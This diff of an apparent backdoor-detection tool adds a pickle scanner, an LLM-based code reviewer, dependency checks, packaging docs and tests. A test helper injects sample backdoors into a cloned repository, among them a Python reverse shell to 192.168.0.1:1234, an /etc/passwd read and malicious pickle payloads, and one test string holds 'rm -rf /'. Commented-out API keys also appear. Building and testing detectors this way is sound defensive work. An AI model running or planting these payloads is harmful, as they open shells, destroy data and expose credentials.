process_path(args.path, output_format, args.mode, output_file)
if args.pickle:
pickleDataDetection(args.pickle, output_file)
else:
process_path(args.path, output_format, args.mode, output_file)
if __name__ == "__main__":

149
detection/cngptdetection.py Normal file
View File

@@ -0,0 +1,149 @@
import os
import threading
import time
import requests
import re
import json
from typing import List, Dict, Any
from detection.utils import read_file_content
class TimeoutException(Exception):
"""自定义异常用于处理超时情况。"""
pass
def detectGPT(content: str,token:str):
"""
检测给定的代码内容中的潜在安全漏洞。
参数:
- content: 要检测的代码字符串。
返回:
- 分类后的漏洞信息的JSON字符串。
"""
url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token
payload = json.dumps({
"messages": [
{
"role": "user",
"content": (
"You are a Python code reviewer. Read the code below and identify any potential "
"security vulnerabilities. Classify them by risk level (high, medium, low, none). "
'Only report the line number and the risk level.\nYou should output the result as '
'json format in one line. For example: [{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnerable}"}] '
"Each of these three fields is required.\nYou are required to only output the json format. "
"Do not output any other information." + content
)
}
]
})
headers = {
'Content-Type': 'application/json'
}
try:
response = requests.post(url, headers=headers, data=payload)
response.raise_for_status()
res_json = response.json()
message_content = res_json.get('result')
if message_content is None:
raise ValueError("API response content is None")
except requests.RequestException as e:
raise ValueError(f"Request failed: {str(e)}")
extracted_data = extract_json_from_text(message_content)
classified_results = {"high": [], "medium": [], "low": [], "none": []}
for res in extracted_data:
# print(res)
try:
line_number = int(res["Line"])
classified_results[res["Risk"]].append(
(line_number, content.split("\n")[line_number - 1].strip())
)
except (ValueError, IndexError, KeyError):
continue
return classified_results
def get_access_token(api_key: str, secret_key: str) -> str:
"""
使用API密钥和秘密生成访问令牌。
返回:
- access_token字符串。
"""
url = "https://aip.baidubce.com/oauth/2.0/token"
params = {"grant_type": "client_credentials", "client_id": api_key, "client_secret": secret_key}
response = requests.post(url, params=params)
response.raise_for_status()
return response.json().get("access_token")
def extract_json_from_text(text: str) -> List[Dict[str, Any]]:
"""
从文本中提取JSON数据。
参数:
- text: 包含JSON数据的字符串文本。
返回:
- 包含提取JSON数据的字典列表。
"""
json_match = re.search(r'\[\s*{.*?}\s*\]', text, re.DOTALL)
if not json_match:
print("未找到 JSON 数据")
return []
json_string = json_match.group(0)
try:
data = json.loads(json_string)
except json.JSONDecodeError as e:
print(f"解码 JSON 时出错: {e}")
return []
return data
def GPTdetectFileList(fileList):
api_key = os.getenv("BAIDU_API_KEY")
secret_key = os.getenv("BAIDU_SECRET_KEY")
# api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa"
# secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7"
if not api_key or not secret_key:
raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
# print(len(fileList))
results = {"high": [], "medium": [], "low": [], "none": []}
threads = []
token = get_access_token(api_key, secret_key)
# print(token)
for file in fileList:
content = read_file_content(str(file))
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token)))
for thread in threads:
thread.start()
time.sleep(0.5)
for thread in threads:
thread.join()
return results
def GPTThread(filename, content, results,token):
res = detectGPT(content,token)
# print(res)
for key in res:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{filename}: Line {line_num}", line)
for line_num, line in res[key]
]
)

View File

@@ -0,0 +1,149 @@
import io
import json
import pickle
class _Unframer:
def __init__(self, file_read, file_readline, file_tell=None):
self.file_read = file_read
self.file_readline = file_readline
self.current_frame = None
def readinto(self, buf):
if self.current_frame:
n = self.current_frame.readinto(buf)
if n == 0 and len(buf) != 0:
self.current_frame = None
n = len(buf)
buf[:] = self.file_read(n)
return n
if n < len(buf):
raise pickle.UnpicklingError("pickle exhausted before end of frame")
return n
else:
n = len(buf)
buf[:] = self.file_read(n)
return n
def read(self, n):
if self.current_frame:
data = self.current_frame.read(n)
if not data and n != 0:
self.current_frame = None
return self.file_read(n)
if len(data) < n:
raise pickle.UnpicklingError("pickle exhausted before end of frame")
return data
else:
return self.file_read(n)
def readline(self):
if self.current_frame:
data = self.current_frame.readline()
if not data:
self.current_frame = None
return self.file_readline()
if data[-1] != b"\n"[0]:
raise pickle.UnpicklingError("pickle exhausted before end of frame")
return data
else:
return self.file_readline()
def load_frame(self, frame_size):
if self.current_frame and self.current_frame.read() != b"":
raise pickle.UnpicklingError(
"beginning of a new frame before end of current frame"
)
self.current_frame = io.BytesIO(self.file_read(frame_size))
dangerous_modules = ["os", "subprocess", "builtins", "nt"]
dangerous_names = [
"system",
"popen",
"run",
"call",
"check_output",
"check_call",
]
class pickleScanner:
def __init__(
self, file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None
):
self._buffers = iter(buffers) if buffers is not None else None
self._file_readline = file.readline
self._file_read = file.read
self.memo = {}
self.encoding = encoding
self.errors = errors
self.proto = 0
self.fix_imports = fix_imports
self.file = file
self.ReduceCount = 0
self.maliciousModule = []
def find_class(self, module, name):
if module.decode() in dangerous_modules or name.decode() in dangerous_names:
# self.maliciousCount += 1
self.maliciousModule.append((module.decode(), name.decode()))
def load(self):
self._unframer = _Unframer(self._file_read, self._file_readline)
self.read = self._unframer.read
self.readinto = self._unframer.readinto
self.readline = self._unframer.readline
self.seek = self.file.seek
self.metastack = []
self.stack = []
self.append = self.stack.append
self.proto = 0
# 扫描所有的opcodes
opcode = self.read(1)
while opcode:
if opcode == b"c":
self.seek(-2, 1)
codeN1 = self.read(1)
if (
65 <= ord(codeN1) <= 90
or 97 <= ord(codeN1) <= 122
or ord(codeN1) == 0
):
self.read(1)
else:
self.read(1)
module = self.readline()[:-1]
name = self.readline()[:-1]
self.find_class(module, name)
elif opcode in self.unsafe_opcodes:
self.ReduceCount += 1
opcode = self.read(1)
unsafe_opcodes = {
b"r", # REDUCE - call a callable with arguments
b"R", # REDUCE - same as 'r', but for args tuple
}
def output(self) -> dict:
return {
"ReduceCount": self.ReduceCount,
"maliciousModule": self.maliciousModule,
}
def pickleDataDetection(filename: str, output_file=None):
"""
:param file: pickle file path
"""
with open(filename, "rb") as file:
pickscan = pickleScanner(file)
pickscan.load()
res = pickscan.output()
return res
if __name__ == "__main__":
pickleDataDetection("test.pkl")

View File

@@ -0,0 +1,44 @@
from typing import List, Tuple
import io
import os
import subprocess
from contextlib import redirect_stdout, redirect_stderr
def run_pycdc(exe_path: str, pyc_file: str) -> str:
"""
Executes pycdc.exe with the given .pyc file using a command line string and captures the output.
Args:
exe_path (str): Path to the pycdc.exe executable.
pyc_file (str): Path to the .pyc file to decompile.
Returns:
str: Output from pycdc.exe.
"""
if not os.path.isfile(exe_path):
return "invalid"
command = f'"{exe_path}" "{pyc_file}"'
result = subprocess.run(
command, capture_output=True, text=True, shell=True, encoding="utf-8"
)
return result.stdout
def disassemble_pyc(file_path: str, pycdc_addr=None) -> str:
"""
Disassembles a .pyc file using uncompyle6.
Args:
file_path (str): The path to the .pyc file.
Returns:
str: The disassembled code as a string.
"""
output = io.StringIO()
if pycdc_addr is None:
return "none"
else:
return run_pycdc(pycdc_addr, file_path)

View File

@@ -1,279 +1,268 @@
import re
import os
import requests
import argparse
import requests
from bs4 import BeautifulSoup
from typing import List, Tuple, Optional
from packaging import version
from packaging.specifiers import SpecifierSet
from packaging.version import Version, InvalidVersion
import sys
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from colorama import Fore, Style, init
from tqdm import tqdm
import html
import os
def fetch_html(url: str) -> Optional[str]:
"""Fetch HTML content from the specified URL.
init(autoreset=True) # 初始化colorama并在每次打印后自动重置颜色
Args:
url (str): URL to fetch HTML from.
Returns:
Optional[str]: HTML content as a string, or None if fetch fails.
"""
response = requests.get(url)
if response.status_code == 200:
def fetch_html(url: str) -> str:
try:
response = requests.get(url)
response.raise_for_status()
return response.text
return None
except requests.RequestException as e:
print(f"Error fetching {url}: {e}")
return ""
def parse_html(html: str) -> List[Tuple[str, List[str]]]:
"""Parse HTML to get content of all 'a' and 'span' tags under the second 'td' of each 'tr'.
Args:
html (str): HTML content as a string.
Returns:
List[Tuple[str, List[str]]]: A list of tuples containing the text of 'a' tags and lists of 'span' texts.
"""
def parse_html(html: str) -> list:
soup = BeautifulSoup(html, "html.parser")
table = soup.find("table", id="sortable-table")
if not table:
return []
rows = table.find_all("tr", class_="vue--table__row")
results = []
if table:
rows = table.find("tbody").find_all("tr")
for row in rows:
tds = row.find_all("td")
if len(tds) >= 2:
a_tags = tds[1].find_all("a")
span_tags = tds[1].find_all("span")
spans = [span.text.strip() for span in span_tags]
for a_tag in a_tags:
results.append((a_tag.text.strip(), spans))
for row in rows:
info = {}
link = row.find("a")
chip = row.find("span", class_="vue--chip__value")
if link and chip:
info["link"] = link.get_text(strip=True)
info["chip"] = chip.get_text(strip=True)
results.append(info)
return results
def format_results(results: List[Tuple[str, List[str]]]) -> str:
"""Format extracted data as a string.
Args:
results (List[Tuple[str, List[str]]]): Extracted data to format.
Returns:
str: Formatted string of the extracted data.
"""
formatted_result = ""
for package_name, version_ranges in results:
formatted_result += f"Package Name: {package_name}\n"
formatted_result += "Version Ranges: " + ", ".join(version_ranges) + "\n"
formatted_result += "-" * 50 + "\n"
return formatted_result
def trans_vulnerable_packages(content):
"""将漏洞版本中的集合形式转换为大于小于的格式
Args:
content (str): 漏洞版本汇总信息.
"""
vulnerabilities = {}
blocks = content.split("--------------------------------------------------")
range_pattern = re.compile(r"\[(.*?),\s*(.*?)\)")
for block in blocks:
name_match = re.search(r"Package Name: (.+)", block)
if name_match:
package_name = name_match.group(1).strip()
ranges = range_pattern.findall(block)
specifier_list = []
for start, end in ranges:
if start and end:
specifier_list.append(f">={start},<{end}")
elif start:
specifier_list.append(f">={start}")
elif end:
specifier_list.append(f"<{end}")
if specifier_list:
vulnerabilities[package_name] = SpecifierSet(",".join(specifier_list))
return vulnerabilities
def format_vulnerabilities(vuln_packages):
"""将字典形式的漏洞信息格式化
Args:
vuln_packages (List[Tuple[str, List[str]]]): Extracted data to format.
"""
res = ""
for package, specifiers in vuln_packages.items():
res += f"Package Name: {package}\n"
res += f"Version Ranges: {specifiers}\n"
res += "-" * 50 + "\n"
return res
def load_requirements(filename):
"""从文件加载项目的依赖信息"""
with open(filename, "r", encoding="utf-8") as file:
lines = file.readlines()
requirements = {}
for line in lines:
if "==" in line:
package_name, package_version = line.strip().split("==")
requirements[package_name] = package_version
def load_requirements(file_path: str) -> list:
requirements = []
try:
with open(file_path, "r") as file:
for line in file:
line = line.strip()
if line and not line.startswith("#"):
requirements.append(line)
except FileNotFoundError:
print(f"Error: File {file_path} not found.")
sys.exit(1)
return requirements
def check_vulnerabilities(requirements, vulnerabilities, output_file):
"""检查依赖项是否存在已知漏洞,并输出结果"""
results_warning = [] # 存储有漏洞的依赖
results_ok = [] # 存储没有漏洞的依赖
for req_name, req_version in requirements.items():
if req_name in vulnerabilities:
spec = vulnerabilities[req_name]
if version.parse(req_version) in spec:
results_warning.append(
f"WARNING: {req_name}=={req_version} is vulnerable!"
)
else:
results_ok.append(f"OK: {req_name}=={req_version} is not affected.")
else:
results_ok.append(
f"OK: {req_name} not found in the vulnerability database."
)
# 合并结果,先输出所有警告,然后输出所有正常情况
results = results_warning + results_ok
# print(results)
if output_file:
filename, ext = os.path.splitext(output_file)
output_format = ext[1:] if ext[1:] else "txt"
if output_format not in ["txt", "md", "html", "pdf"]:
print("Warning: Invalid file format specified. Defaulting to TXT format.")
output_format = "txt" # 确保使用默认格式
output_file = filename + ".txt"
output_results(output_file, results, output_format)
def version_in_range(version, range_str: str) -> bool:
if version is not None:
try:
v = Version(version)
except InvalidVersion:
return False
else:
print("\n".join(results))
if range_str[-2] == ",":
return True
ranges = range_str.split(",")
for range_part in ranges:
range_part = range_part.strip("[]()")
if range_part:
try:
if range_part.endswith(")"):
upper = Version(range_part[:-1])
if v >= upper:
return False
elif range_part.startswith("["):
lower = Version(range_part[1:])
if v < lower:
return False
except InvalidVersion:
return False
return True
def trans_vulnerable_packages_to_dict(content):
"""将漏洞信息转换为字典格式
Args:
content str: 漏洞信息汇总.
def check_vulnerabilities(requirements: list, base_url: str) -> str:
results = []
for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"):
version = ""
if "==" in req:
package_name, version = req.split("==")
else:
package_name, version = req, None
url = f"{base_url}{package_name}"
# print(f"\nFetching data for {package_name} from {url}")
html_content = fetch_html(url)
if html_content:
extracted_data = parse_html(html_content)
if extracted_data:
relevant_vulns = []
for vuln in extracted_data:
if version_in_range(version, vuln["chip"]):
relevant_vulns.append(vuln)
if relevant_vulns:
result = f"Vulnerabilities found for {package_name}:\n"
for vuln in relevant_vulns:
result += f" - {vuln['link']}\n"
results.append(result)
return "\n".join(results)
def save_to_file(output_path: str, data: str):
if output_path.endswith(".html"):
save_as_html(output_path, data)
elif output_path.endswith(".pdf"):
save_as_pdf(output_path, data)
elif output_path.endswith(".md"):
save_as_markdown(output_path, data)
else:
save_as_txt(output_path, data)
def save_as_html(output_path: str, data: str):
escaped_data = html.escape(data)
html_content = f"""
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
<title>Vulnerability Report</title>
<style>
body {{
font-family: Arial, sans-serif;
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
background-size: cover;
color: #333;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}}
.container {{
background: rgba(255, 255, 255, 0.8);
border-radius: 10px;
padding: 20px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 800px;
width: 100%;
margin: 20px;
overflow-y: auto;
max-height: 90vh;
}}
.title {{
font-size: 24px;
font-weight: bold;
text-align: center;
margin-bottom: 20px;
}}
pre {{
white-space: pre-wrap;
word-wrap: break-word;
font-size: 14px;
line-height: 1.5;
color: #333;
background: #f4f4f4;
padding: 10px;
border-radius: 5px;
border: 1px solid #ddd;
overflow: auto;
font-weight: bold;
}}
</style>
</head>
<body>
<div class="container">
<div class="title">Vulnerability Report</div>
<pre>{escaped_data}</pre>
</div>
</body>
</html>
"""
vulnerabilities = {}
blocks = content.split("--------------------------------------------------")
for block in blocks:
name_match = re.search(r"Package Name: (.+)", block)
range_match = re.search(r"Version Ranges: (.+)", block)
if name_match and range_match:
package_name = name_match.group(1).strip()
version_range = range_match.group(1).strip()
version_range = ",".join(
[part.strip() for part in version_range.split(",")]
)
vulnerabilities[package_name] = SpecifierSet(version_range)
return vulnerabilities
with open(output_path, "w", encoding="utf-8") as file:
file.write(html_content)
def output_pdf(results, file_name):
doc = SimpleDocTemplate(file_name, pagesize=letter)
def save_as_pdf(output_path: str, data: str):
doc = SimpleDocTemplate(output_path, pagesize=letter)
story = []
styles = getSampleStyleSheet()
# Custom styles
title_style = styles["Title"]
title_style.alignment = 1 # Center alignment
warning_style = ParagraphStyle(
"WarningStyle", parent=styles["BodyText"], fontName="Helvetica-Bold"
# Add the title centered
title_style = ParagraphStyle(
"Title",
parent=styles["Title"],
alignment=1, # Center alignment
fontSize=24,
leading=28,
spaceAfter=20,
fontName="Helvetica-Bold",
)
normal_style = styles["BodyText"]
# Add the title
title = Paragraph("Vulnerability Report", title_style)
story.append(title)
story.append(Spacer(1, 20)) # Space after title
# Iterate through results to add entries
for result in results:
if "WARNING:" in result:
# Add warning text in bold
entry = Paragraph(
result.replace("WARNING:", "<b>WARNING:</b>"), warning_style
)
else:
# Add normal text
entry = Paragraph(result, normal_style)
# Normal body text style
normal_style = ParagraphStyle(
"BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12
)
story.append(entry)
story.append(Spacer(1, 12)) # Space between entries
# Add the vulnerability details
for line in data.split("\n"):
if line.strip(): # Skip empty lines
story.append(Paragraph(line, normal_style))
doc.build(story)
def output_results(filename, results, format_type):
"""根据指定的格式输出结果"""
output_dir = os.path.dirname(filename)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(filename, "w", encoding="utf-8") as file:
if format_type == "html":
file.write("<html><head><title>Vulnerability Report</title></head><body>\n")
file.write("<h1>Vulnerability Report</h1>\n")
for result in results:
file.write(f"<p>{result}</p>\n")
file.write("</body></html>")
elif format_type == "md":
file.write("# Vulnerability Report\n")
for result in results:
file.write(f"* {result}\n")
elif format_type == "pdf":
output_pdf(results, filename)
else: # 默认为txt
for result in results:
file.write(f"{result}\n")
print("Results have been saved as " + filename)
def save_as_markdown(output_path: str, data: str):
with open(output_path, "w") as file:
file.write("## Vulnerability Report: \n\n")
file.write(data)
def main():
parser = argparse.ArgumentParser(
description="Check project dependencies for vulnerabilities."
)
parser.add_argument(
"requirements_file", help="Path to the requirements file of the project"
)
parser.add_argument(
"-o",
"--output",
help="Output file path with extension, e.g., './output/report.txt'",
)
args = parser.parse_args()
base_url = "https://security.snyk.io/vuln/pip/"
page_number = 1
crawler_results = ""
while True:
url = f"{base_url}{page_number}"
print(f"Fetching data from {url}")
html_content = fetch_html(url)
if not html_content:
print("No more data found or failed to fetch.")
break
extracted_data = parse_html(html_content)
if not extracted_data:
print("No relevant data found on page.")
break
crawler_results += format_results(extracted_data)
page_number += 1
print("Results have been stored in memory.\n")
trans_res = trans_vulnerable_packages(crawler_results)
trans_res = format_vulnerabilities(trans_res)
trans_res = trans_vulnerable_packages_to_dict(trans_res)
requirements = load_requirements(args.requirements_file)
check_vulnerabilities(requirements, trans_res, args.output)
def save_as_txt(output_path: str, data: str):
with open(output_path, "w") as file:
file.write("Vulnerability Report: \n\n")
file.write(data)
if __name__ == "__main__":
main()
def print_separator(title, char="-", length=50, padding=2):
print(f"{title:^{length + 4*padding}}") # 居中打印标题两侧各有padding个空格
print(char * (length + 2 * padding)) # 打印分割线两侧各有padding个字符的空格
def modify_file_name(file_path: str) -> str:
"""
Modify the file name by adding '-re' before the file extension.
Args:
file_path (str): The original file path.
Returns:
str: The modified file path.
"""
directory, file_name = os.path.split(file_path)
name, ext = os.path.splitext(file_name)
new_file_name = f"{name}-re{ext}"
new_file_path = os.path.join(directory, new_file_name)
return new_file_path
def requirement_detection(requirement_path, output_path=None):
base_url = "https://security.snyk.io/package/pip/"
requirements = load_requirements(requirement_path)
results = check_vulnerabilities(requirements, base_url)
if output_path is not None:
new_path = modify_file_name(output_path)
save_to_file(new_path, results)
print(f"Vulnerability scan complete. Results saved to {output_path}")
print(f"Requirements scan complete. Results saved to {new_path}")
else:
print_separator("\nVulnerability Report", "=", 40, 5)
print(results)

View File

@@ -4,7 +4,7 @@ import sys
def read_file_content(file_path: str) -> str:
try:
with open(file_path, "r", encoding="utf-8") as file:
with open(file_path, "r", encoding="utf-8", errors="ignore") as file:
return file.read()
except FileNotFoundError:
print("Error: File not found.")
@@ -21,4 +21,4 @@ def remove_comments(code: str, extension: str) -> str:
code = re.sub(r"//.*", "", code)
code = re.sub(r"/\*.*?\*/", "", code, flags=re.DOTALL)
return code.strip()
return code.strip()
return code.strip()

View File

@@ -1,9 +1,64 @@
# 项目设计文档 - 后门检测系统
## 打包
### 简介
本项目需要将 Python 代码打包成`pip`包和`deb`包,以便于分发和安装。以下是如何实现和使用该打包功能的详细步骤。
### pip
#### 打包命令
```bash
pip install wheel
python setup.py sdist bdist_wheel
```
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
#### 本地安装
- 安装 .whl 文件:
``` bash
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
```
- 安装 .tar.gz 文件:
``` bash
pip install dist/backdoor_buster-0.1.0.tar.gz
```
#### 上传到 PyPI
- 安装 twine
``` bash
pip install twine
```
- 使用 twine 上传包到 PyPI
``` bash
twine upload dist/*
```
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
#### 使用 PyPI 安装
包上传到 PyPI 后,可以通过以下命令安装:
``` bash
pip install backdoor_buster
```
## 静态代码后门检测
**功能描述**:
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp` 文件。
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp`, `.pyc` 文件。
**主要组件**:
@@ -67,7 +122,7 @@ python backdoor_detection.py ./src -o ./output/report.pdf
**使用示例**:
```bash
python requirements_detection.py ./requirements.txt -o ./output/report.md
python -m detection.requirements_detection ./requirements.txt -o ./output/report.md
```
---

View File

@@ -46,7 +46,18 @@
- **主要应用**:通过爬虫收集漏洞依赖信息并进行汇总,用于判断依赖是否存在漏洞版本。
## 8. 代码和风险分析
## 8. 打包
本项目支持打包作为`pip`包进行发布
- **主要应用**
- `pip`通过`wheel`并自行撰写`setup.py`以及`MANIFEST.in`,将项目打包发布
## 9. 反汇编
项目通过`uncompyle6`库提供的反汇编模块可以实现对python字节码进行反汇编之后扫描危险代码
## 10. 代码和风险分析
项目中实现了基本的静态代码分析功能,用于识别和报告潜在的安全风险函数调用,如 `system``exec` 等。

View File

@@ -2,31 +2,68 @@
本文档提供了后门检测系统的使用方法,包括依赖版本漏洞检测和静态代码后门检测两部分。这将帮助用户正确执行安全检测,并理解输出结果。
## 安装需求
在开始使用本系统之前,请确保您的环境中安装了以下依赖:
- Python 3.6 或更高版本
- `packaging` 库:用于版本控制和比较
- `reportlab` 库:用于生成 PDF 报告
您可以通过以下命令安装必要的 Python 库:
```bash
pip install packaging reportlab
```
## 下载和配置
- 克隆或下载后门检测系统到您的本地环境。
- 确保脚本文件 (`requirements_detection.py``backdoor_detection.py`) 在您的工作目录中。
## 打包
### pip
#### 打包命令
```bash
pip install wheel
python setup.py sdist bdist_wheel
```
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
#### 本地安装
- 安装 .whl 文件:
``` bash
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
```
- 安装 .tar.gz 文件:
``` bash
pip install dist/backdoor_buster-0.1.0.tar.gz
```
#### 上传到 PyPI
- 安装 twine
``` bash
pip install twine
```
- 使用 twine 上传包到 PyPI
``` bash
twine upload dist/*
```
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
#### 使用 PyPI 安装
包上传到 PyPI 后,可以通过以下命令安装:
``` bash
pip install backdoor_buster
```
## 运行依赖版本漏洞检测脚本
**命令格式**
```bash
python requirements_detection.py <requirements_file> -o <output_file>
python -m detection.requirements_detection <requirements_file> -o <output_file>
```
**参数说明**
@@ -37,7 +74,7 @@ python requirements_detection.py <requirements_file> -o <output_file>
**示例**
```bash
python requirements_detection.py requirements.txt -o output/report.md
python -m detection.requirements_detection requirements.txt -o output/report.md
```
## 运行静态代码后门检测脚本
@@ -45,7 +82,7 @@ python requirements_detection.py requirements.txt -o output/report.md
**命令格式**
```bash
python backdoor_detection.py <code_path> -o <output_file> -m <mode>
python -m detection <code_path> -o <output_file> -m <mode>
```
**参数说明**
@@ -57,7 +94,7 @@ python backdoor_detection.py <code_path> -o <output_file> -m <mode>
**示例**
```bash
python backdoor_detection.py ./src -o output/report.pdf -m regex
python -m detection ./src -o output/report.pdf -m regex
```
## 结果解读

View File

@@ -2,4 +2,6 @@ reportlab
requests
packaging
openai
bs4
bs4
colorama
tqdm

44
setup.py Normal file
View File

@@ -0,0 +1,44 @@
# pip install wheel
# python setup.py sdist bdist_wheel
from setuptools import setup, find_packages
def read_file(filename: str) -> str:
"""Read a file and return its content as a string.
Args:
filename (str): The name of the file to read.
Returns:
str: The content of the file.
"""
with open(filename, encoding="utf-8") as f:
return f.read()
setup(
name="backdoor_buster",
version="0.1.0",
author="ciscn",
description="A tool for integrated backdoor detection",
long_description=read_file("README.md"),
long_description_content_type="text/markdown",
url="https://git.mamahaha.work/sangge/BackDoorBuster",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
install_requires=[
"reportlab",
"requests",
"packaging",
"openai",
"bs4",
"tqdm",
"colorama",
],
)

159
tests/final_tests_util.py Normal file
View File

@@ -0,0 +1,159 @@
from typing import Tuple, List
from git import Repo # type: ignore
import random
from pathlib import Path
import pickle
import os
import py_compile
def clone_repo(repo_url: str, clone_dir: str) -> None:
"""
Clone a Git repository to the specified directory.
Args:
repo_url (str): The URL of the Git repository to clone.
clone_dir (str): The directory where the repository should be cloned.
"""
try:
Repo.clone_from(repo_url, clone_dir, depth=1)
except Exception as e:
print(f"Error cloning repository: {e}")
# a return type of backdoor. Include injected file name and number.
def inject_random_backdoor(
path: str, sample_rate: float = 0.1
) -> Tuple[Tuple[str, int], ...]:
"""
Insert random backdoor into the path.
Args:
path (str): The path to the repository to insert the backdoor into.
pickle (bool): Whether to insert a backdoor into a pickle file.
pyc (bool): Whether to insert a backdoor into a compiled Python file.
"""
project_path = Path(path)
all_python_files = list(project_path.rglob("*.py"))
injected_python_files = []
for python_file in all_python_files:
# sample files to inject backdoor
if random.random() < sample_rate:
injected_python_files.append(python_file)
injectedNum = len(injected_python_files)
results: List[Tuple[str, int]] = []
# inject backdoor
for python_file in injected_python_files:
with open(python_file, "r+", errors="ignore") as f:
lines = f.readlines()
total_lines = len(lines)
inject_line_number = random.randint(0, total_lines)
# choose random backdoor
inject_code = random.choice(backdoors)
lines.insert(inject_line_number, inject_code + "\n")
f.seek(0)
f.writelines(lines)
results.append((str(python_file), inject_line_number))
return tuple(results)
# 示例1: 通过 os.system 执行命令
backdoor1 = """import os
os.system('ls')"""
# 示例2: 通过 subprocess 模块执行命令
backdoor2 = """import subprocess
subprocess.call(['ls', '-l'])"""
# 示例3: 打开一个反向 shell
backdoor3 = """import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])"""
# 示例4: 通过 eval 执行任意代码
backdoor4 = """code = "print('Hello, World!')"
eval(code)"""
# 示例5: 通过 exec 执行任意代码
backdoor5 = """code = '''
import os
os.system('ls')
'''
exec(code)"""
# 示例7: 读取并显示文件内容
backdoor7 = """with open('/etc/passwd', 'r') as file:
data = file.read()
print(data)"""
backdoors = [
backdoor1,
backdoor2,
backdoor3,
backdoor4,
backdoor5,
backdoor7,
]
backdoors_pickle = [
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.',
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.',
b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.',
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.'
]
def inject_pickle_backdoor(root_path: str) -> None:
"""
Generate a pickle backdoor and insert it into the specified path.
Args:
path (str): The path to the repository to insert the backdoor into.
"""
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
paths = random.sample(all_path, random.randrange(1, len(all_path)))
for path in paths:
backdoor_id = random.randrange(0, len(backdoors_pickle))
backdoor = backdoors_pickle[backdoor_id]
filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
with open(filename, "wb") as f:
pickle.dump(backdoor, f)
def inject_pyc_backdoor(root_path: str) -> None:
"""
Generate a pyc backdoor and insert it into the specified path.
Args:
path (str): The path to the repository to insert the backdoor into.
"""
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
paths = random.sample(all_path, random.randrange(1, len(all_path)))
for path in paths:
backdoor_id = random.randrange(0, len(backdoors))
backdoor = backdoors[backdoor_id]
py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
with open(py_filename, "w") as f:
f.write(backdoor)
py_compile.compile(py_filename, cfile=pyc_filename)
os.remove(py_filename)
if __name__ == "__main__":
repo_url = "https://github.com/TheAlgorithms/Python.git"
clone_dir = "/tmp/repo"
clone_repo(repo_url, clone_dir)
inject_random_backdoor(clone_dir)
inject_pickle_backdoor(clone_dir)

View File

@@ -0,0 +1,40 @@
import unittest
import warnings
import os
import json
from detection.cngptdetection import detectGPT
class TestBackdoorDetection(unittest.TestCase):
def test_gpt_risk_detection(self):
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
content = """import os
os.system('rm -rf /') # high risk
exec('print("Hello")') # high risk
eval('2 + 2') # high risk
"""
results1 = detectGPT(content)
classified_results = json.loads(results1)
self.assertEqual(len(classified_results["high"]), 3)
def test_gpt_no_risk_detection(self):
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
content = """a = 10
b = a + 5
print('This should not be detected as risky.')
"""
results2 = detectGPT(content)
classified_results = json.loads(results2)
